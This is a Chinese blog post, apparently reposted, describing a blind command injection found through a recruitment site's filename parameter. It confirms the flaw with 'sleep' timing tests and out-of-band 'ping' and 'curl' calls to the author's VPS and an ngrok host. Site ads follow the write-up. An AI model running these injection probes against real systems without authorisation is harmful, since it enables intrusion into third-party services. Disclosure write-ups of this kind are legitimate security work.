我在某个招聘网站发现了一个命令注入漏洞,很有趣的是它的注入参数居然是文件名,下面是漏洞复现过程!
首先我用命令”sleep 5”来对参数进行测试,发现响应延迟了5-6秒
我再次用命令”sleep 10”来进行验证,发现响应延迟了10-11秒,这让我确信这里确实存在漏洞
接着我尝试去ping我的服务器”ping -c 5 < VPS IP >”,并在服务器上运行”tcpdump -i < interface > -n icmp”进行抓包
下面我在VPS上用ngrok搭建web服务”./ngrok http 80”,然后在客户端文件名参数上执行”curl blablabla.ngrok.io”
现在看看ngrok web界面的响应,我收到来自IP地址000.000.39.169的request请求,这和上面的ICMP请求IP一致
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
机器学习系统设计
[德] Willi Richert、Luis Pedro Coelho / 刘峰 / 人民邮电出版社 / 2014-7-1 / CNY 49.00
如今,机器学习正在互联网上下掀起热潮,而Python则是非常适合开发机器学习系统的一门优秀语言。作为动态语言,它支持快速探索和实验,并且针对Python的机器学习算法库的数量也与日俱增。本书最大的特色,就是结合实例分析教会读者如何通过机器学习解决实际问题。 本书将向读者展示如何从原始数据中发现模式,首先从Python与机器学习的关系讲起,再介绍一些库,然后就开始基于数据集进行比较正式的项目开......一起来看看 《机器学习系统设计》 这本书的介绍吧!
HEX HSV 转换工具
HEX HSV 互换工具
HSV CMYK 转换工具
HSV CMYK互换工具